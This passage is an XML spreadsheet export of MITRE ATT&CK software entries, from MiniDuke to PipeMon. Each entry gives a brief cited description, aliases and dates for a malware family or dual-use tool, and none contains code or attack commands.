    <t>https://attack.mitre.org/software/S0133</t>
  </si>
  <si>
    <t>Mal/Miner-C, PhotoMiner</t>
  </si>
  <si>
    <t>S0051</t>
  </si>
  <si>
    <t>MiniDuke</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0051</t>
  </si>
  <si>
    <t>23 September 2020</t>
  </si>
  <si>
    <t>S0280</t>
  </si>
  <si>
    <t>MirageFox</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0280</t>
  </si>
  <si>
    <t>S0084</t>
  </si>
  <si>
    <t>Mis-Type</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0084</t>
  </si>
  <si>
    <t>S0083</t>
  </si>
  <si>
    <t>Misdat</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0083</t>
  </si>
  <si>
    <t>S0080</t>
  </si>
  <si>
    <t>Mivast</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0080</t>
  </si>
  <si>
    <t>25 March 2020</t>
  </si>
  <si>
    <t>S0079</t>
  </si>
  <si>
    <t>MobileOrder</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0079</t>
  </si>
  <si>
    <t>S0553</t>
  </si>
  <si>
    <t>MoleNet</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0553</t>
  </si>
  <si>
    <t>S0149</t>
  </si>
  <si>
    <t>MoonWind</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0149</t>
  </si>
  <si>
    <t>S0284</t>
  </si>
  <si>
    <t>More_eggs</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0284</t>
  </si>
  <si>
    <t>3.0</t>
  </si>
  <si>
    <t>SKID, SpicyOmelette, Terra Loader</t>
  </si>
  <si>
    <t>Drew Church, Splunk</t>
  </si>
  <si>
    <t>S0256</t>
  </si>
  <si>
    <t>Mosquito</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0256</t>
  </si>
  <si>
    <t>S0590</t>
  </si>
  <si>
    <t>NBTscan</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0590</t>
  </si>
  <si>
    <t>S0272</t>
  </si>
  <si>
    <t>NDiskMonitor</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0272</t>
  </si>
  <si>
    <t>S0034</t>
  </si>
  <si>
    <t>NETEAGLE</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0034</t>
  </si>
  <si>
    <t>S0198</t>
  </si>
  <si>
    <t>NETWIRE</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017) (Citation: McAfee Netwire Mar 2015) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0198</t>
  </si>
  <si>
    <t>Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>S0353</t>
  </si>
  <si>
    <t>NOKKI</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0353</t>
  </si>
  <si>
    <t>S0205</t>
  </si>
  <si>
    <t>Naid</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0205</t>
  </si>
  <si>
    <t>S0228</t>
  </si>
  <si>
    <t>NanHaiShu</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0228</t>
  </si>
  <si>
    <t>S0336</t>
  </si>
  <si>
    <t>NanoCore</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0336</t>
  </si>
  <si>
    <t>S0247</t>
  </si>
  <si>
    <t>NavRAT</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0247</t>
  </si>
  <si>
    <t>S0210</t>
  </si>
  <si>
    <t>Nerex</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) is a Trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0210</t>
  </si>
  <si>
    <t>S0039</t>
  </si>
  <si>
    <t>Net</t>
  </si>
  <si>
    <t>The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)
[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using &lt;code&gt;net use&lt;/code&gt; commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as &lt;code&gt;net1 user&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0039</t>
  </si>
  <si>
    <t>net.exe</t>
  </si>
  <si>
    <t>David Ferguson, CyberSponse</t>
  </si>
  <si>
    <t>S0056</t>
  </si>
  <si>
    <t>Net Crawler</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0056</t>
  </si>
  <si>
    <t>NetC</t>
  </si>
  <si>
    <t>S0033</t>
  </si>
  <si>
    <t>NetTraveler</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0033</t>
  </si>
  <si>
    <t>S0457</t>
  </si>
  <si>
    <t>Netwalker</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0457</t>
  </si>
  <si>
    <t>S0508</t>
  </si>
  <si>
    <t>Ngrok</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0508</t>
  </si>
  <si>
    <t>15 September 2020</t>
  </si>
  <si>
    <t>29 September 2020</t>
  </si>
  <si>
    <t>Janantha Marasinghe</t>
  </si>
  <si>
    <t>S0118</t>
  </si>
  <si>
    <t>Nidiran</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0118</t>
  </si>
  <si>
    <t>Backdoor.Nidiran</t>
  </si>
  <si>
    <t>S0359</t>
  </si>
  <si>
    <t>Nltest</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0359</t>
  </si>
  <si>
    <t>14 February 2019</t>
  </si>
  <si>
    <t>22 April 2019</t>
  </si>
  <si>
    <t>S0368</t>
  </si>
  <si>
    <t>NotPetya</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0368</t>
  </si>
  <si>
    <t>26 March 2019</t>
  </si>
  <si>
    <t>Diskcoder.C, ExPetr, GoldenEye, Nyetya, Petrwrap</t>
  </si>
  <si>
    <t>S0138</t>
  </si>
  <si>
    <t>OLDBAIT</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0138</t>
  </si>
  <si>
    <t>Sasfis</t>
  </si>
  <si>
    <t>S0165</t>
  </si>
  <si>
    <t>OSInfo</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim's computer and network. (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0165</t>
  </si>
  <si>
    <t>S0402</t>
  </si>
  <si>
    <t>OSX/Shlayer</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS. It was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0402</t>
  </si>
  <si>
    <t>29 August 2019</t>
  </si>
  <si>
    <t>Crossrider</t>
  </si>
  <si>
    <t>S0352</t>
  </si>
  <si>
    <t>OSX_OCEANLOTUS.D</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0352</t>
  </si>
  <si>
    <t>Backdoor.MacOS.OCEANLOTUS.F</t>
  </si>
  <si>
    <t>S0346</t>
  </si>
  <si>
    <t>OceanSalt</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0346</t>
  </si>
  <si>
    <t>S0340</t>
  </si>
  <si>
    <t>Octopus</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0340</t>
  </si>
  <si>
    <t>S0439</t>
  </si>
  <si>
    <t>Okrum</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0439</t>
  </si>
  <si>
    <t>S0365</t>
  </si>
  <si>
    <t>Olympic Destroyer</t>
  </si>
  <si>
    <t xml:space="preserve">[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0365</t>
  </si>
  <si>
    <t>S0052</t>
  </si>
  <si>
    <t>OnionDuke</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0052</t>
  </si>
  <si>
    <t>S0264</t>
  </si>
  <si>
    <t>OopsIE</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0264</t>
  </si>
  <si>
    <t>S0229</t>
  </si>
  <si>
    <t>Orz</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0229</t>
  </si>
  <si>
    <t>AIRBREAK</t>
  </si>
  <si>
    <t>S0594</t>
  </si>
  <si>
    <t>Out1</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0594</t>
  </si>
  <si>
    <t>19 March 2021</t>
  </si>
  <si>
    <t>S0072</t>
  </si>
  <si>
    <t>OwaAuth</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0072</t>
  </si>
  <si>
    <t>S0598</t>
  </si>
  <si>
    <t>P.A.S. Webshell</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0598</t>
  </si>
  <si>
    <t>Fobushell</t>
  </si>
  <si>
    <t>S0016</t>
  </si>
  <si>
    <t>P2P ZeuS</t>
  </si>
  <si>
    <t>[P2P ZeuS](https://attack.mitre.org/software/S0016) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0016</t>
  </si>
  <si>
    <t>Gameover ZeuS, Peer-to-Peer ZeuS</t>
  </si>
  <si>
    <t>S0158</t>
  </si>
  <si>
    <t>PHOREAL</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0158</t>
  </si>
  <si>
    <t>S0254</t>
  </si>
  <si>
    <t>PLAINTEE</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0254</t>
  </si>
  <si>
    <t>S0435</t>
  </si>
  <si>
    <t>PLEAD</t>
  </si>
  <si>
    <t xml:space="preserve">[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0435</t>
  </si>
  <si>
    <t>04 July 2020</t>
  </si>
  <si>
    <t>Tatsuya Daitoku, Cyber Defense Institute, Inc.</t>
  </si>
  <si>
    <t>S0216</t>
  </si>
  <si>
    <t>POORAIM</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0216</t>
  </si>
  <si>
    <t>S0150</t>
  </si>
  <si>
    <t>POSHSPY</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0150</t>
  </si>
  <si>
    <t>S0145</t>
  </si>
  <si>
    <t>POWERSOURCE</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0145</t>
  </si>
  <si>
    <t>DNSMessenger</t>
  </si>
  <si>
    <t>S0223</t>
  </si>
  <si>
    <t>POWERSTATS</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0223</t>
  </si>
  <si>
    <t>Powermud</t>
  </si>
  <si>
    <t>S0371</t>
  </si>
  <si>
    <t>POWERTON</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0371</t>
  </si>
  <si>
    <t>S0184</t>
  </si>
  <si>
    <t>POWRUNER</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0184</t>
  </si>
  <si>
    <t>S0196</t>
  </si>
  <si>
    <t>PUNCHBUGGY</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0196</t>
  </si>
  <si>
    <t>ShellTea</t>
  </si>
  <si>
    <t>S0197</t>
  </si>
  <si>
    <t>PUNCHTRACK</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://attack.mitre.org/groups/G0061) to scrape payment card data. (Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0197</t>
  </si>
  <si>
    <t>PSVC</t>
  </si>
  <si>
    <t>S0208</t>
  </si>
  <si>
    <t>Pasam</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0208</t>
  </si>
  <si>
    <t>S0122</t>
  </si>
  <si>
    <t>Pass-The-Hash Toolkit</t>
  </si>
  <si>
    <t>[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0122</t>
  </si>
  <si>
    <t>S0556</t>
  </si>
  <si>
    <t>Pay2Key</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0556</t>
  </si>
  <si>
    <t>04 January 2021</t>
  </si>
  <si>
    <t>S0587</t>
  </si>
  <si>
    <t>Penquin</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0587</t>
  </si>
  <si>
    <t>11 March 2021</t>
  </si>
  <si>
    <t>Penquin 2.0, Penquin_x64</t>
  </si>
  <si>
    <t>Antonio Villani, @LDO_CyberSec, Leonardo's Cyber Security Division; Nino Verde, @LDO_CyberSec, Leonardo's Cyber Security Division; Silvio La Porta, @LDO_CyberSec, Leonardo's Cyber Security Division</t>
  </si>
  <si>
    <t>S0517</t>
  </si>
  <si>
    <t>Pillowmint</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0517</t>
  </si>
  <si>
    <t>27 July 2020</t>
  </si>
  <si>
    <t>06 October 2020</t>
  </si>
  <si>
    <t>S0048</t>
  </si>
  <si>
    <t>PinchDuke</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0048</t>
  </si>
  <si>
    <t>S0097</t>
  </si>
  <si>
    <t>Ping</t>
  </si>
  <si>
    <t>[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0097</t>
  </si>
  <si>
    <t>S0501</t>
  </si>
  <si>
    <t>PipeMon</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) is a multi-stage modular backdoor used by [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0501</t>
  </si>
  <si>
    <t>24 August 2020</t>
  </si>
  <si>
    <t>Martin Smolár, ESET; Mathieu Tartare, ESET</t>
  </si>
  <si>
    <t>S0124</t>
  </si>
  <si>
